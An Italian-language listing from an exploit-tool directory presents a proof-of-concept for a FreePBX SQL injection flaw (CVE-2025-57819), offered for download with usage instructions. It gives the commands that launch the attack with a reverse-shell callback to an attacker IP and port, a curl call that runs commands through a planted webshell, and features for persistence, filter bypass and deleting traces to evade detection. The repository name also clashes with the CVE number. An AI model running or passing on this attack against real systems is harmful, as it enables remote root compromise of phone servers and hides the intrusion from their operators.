Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-5781 — Exploit proof-of-concept per CVE-2025-57819 in FreePBX: SQL injection nell'API AJAX per eseguire codice PHP arbitrario, creare una webshell persistente e innescare una reverse shell. | Kitploit
Strumenti/GitHubGitHub/jasonbernier/cve-2025-5781
Meccanismi di PersistenzaExploitSfruttamento di Applicazioni WebPost-ExploitCommand and ControlSviluppo Payload
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

Exploit proof-of-concept per CVE-2025-57819 in FreePBX: SQL injection nell'API AJAX per eseguire codice PHP arbitrario, creare una webshell persistente e innescare una reverse shell.

Vedi Repository
9 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit FreePBX CVE-2025-57819

Descrizione

Questo script sfrutta una vulnerabilità nelle versioni di FreePBX precedenti alla 16.0.26.0 (CVE-2025-57819), consentendo a un attaccante remoto di eseguire codice PHP arbitrario tramite una falla di SQL injection nell'endpoint API AJAX. L'exploit crea sia una webshell sia una reverse shell attivata automaticamente.

Dettagli della vulnerabilità

  • CVE: CVE-2025-57819
  • Versioni interessate: FreePBX < 16.0.26.0
  • Impatto: Esecuzione remota di codice (RCE)
  • Vettore: SQL injection nell'API AJAX (/admin/ajax.php)

Funzionalità

  • Crea una webshell persistente in /pbxshell.php
  • Configura una reverse shell attivata automaticamente tramite cron job
  • Utilizza payload codificati in Base64 per bypassare i filtri
  • Pulizia automatica dei cron job dopo l'esecuzione

Requisiti

  • Python 3.x
  • Libreria requests
  • Netcat (per il listener della reverse shell)

Installazione

root@kitploit:~
git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests

Utilizzo

root@kitploit:~
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT

Parametri:

  • -H HOST: Istanza FreePBX di destinazione (es. https://freepbx.example.com)
  • -lhost LHOST: Il tuo IP per il callback della reverse shell
  • -lport LPORT: Porta per la connessione della reverse shell

Esempio:

root@kitploit:~
python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444

Flusso dell'exploit

  1. Invia il payload di SQL injection per creare una webshell
  2. Attende la creazione della webshell (~2 minuti)
  3. Crea una reverse shell attivata automaticamente tramite cron job
  4. Avvia il listener netcat sulla porta specificata

Utilizzo della webshell

Dopo lo sfruttamento riuscito, accedi alla webshell tramite:

root@kitploit:~
curl -X GET "http://TARGET/pbxshell.php?cmd=id"

Pulizia

L'exploit rimuove automaticamente i cron job dopo l'esecuzione per evitare il rilevamento.

Note

  • Lo script usa -- per commentare la restante sintassi SQL
  • Tutti i comandi vengono eseguiti con privilegi di root
  • Richiede accesso in scrittura alla directory /var/www/html/

Riferimenti

  • CVE-2025-57819
  • Advisory di sicurezza FreePBX
Scarica lo strumento